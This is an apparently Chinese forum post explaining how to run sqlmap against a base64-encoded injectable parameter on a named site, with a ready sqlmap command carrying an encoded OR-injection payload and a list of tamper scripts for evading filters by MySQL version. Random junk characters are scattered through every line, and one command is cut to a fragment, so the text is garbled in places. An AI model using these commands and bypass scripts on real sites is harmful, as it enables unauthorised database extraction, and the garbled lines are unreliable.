WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
% ?5 R- m* i$ i4 A3 ?! H- p( r4 V g$ j. P7 J
sqlmap的tamper里有个base64encode.py
" l& R- Y- J4 Q7 P5 `- e: g- Z' z
: a: s5 y( v4 f- w使用如下
$ {! w* `' y1 }: ^- {1 D x7 `; U+ Z) i9 E! d3 Q' P; ^; l% ]
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs/ T9 S& G1 \# p% f3 c( ]
1 L, m2 e* a& p& ~7 f# U+ c+ G/ @
, n; z/ B7 N5 U3 E5 U7 o
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
' b; r- v0 T3 G5 d% u3 l( ]2 _* Q4 r
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
% Y* G, g5 t* E% L! c8 ~) ?3 a( b6 J
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入 K; z# b0 i$ g' |& [
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
M- O* v5 R8 [! e8 B, _- n首先确定目标数据库版本,然后选择相应的脚本。
2 O. c3 P1 |% V( t1 r% H+ o; d) O+ y-v 3 --batch --tamper "space2hash.py"8 Q" b. ^ h3 I/ U# U, r" c: @, N
9 {* K& b" Q# G8 ^1 A/ w
还有其他一些插件:5 W4 ~+ V6 w( V* e: p. |
encodes编码 ——charencode.py
, f. }1 V" x! Z- D2 {% Bbase64编码 —— base64encode.py
T) i: W- ^1 C+ r+ j替换空格和关键字 —— halfversionedmorekeywords.py, w; ^1 O: c) S8 V) d
| * Z- _3 W1 Q* C6 q
' w) p1 F4 T9 D; g
( z4 B" L: a8 Z; \+ h
" ?9 S+ W: |, F3 u |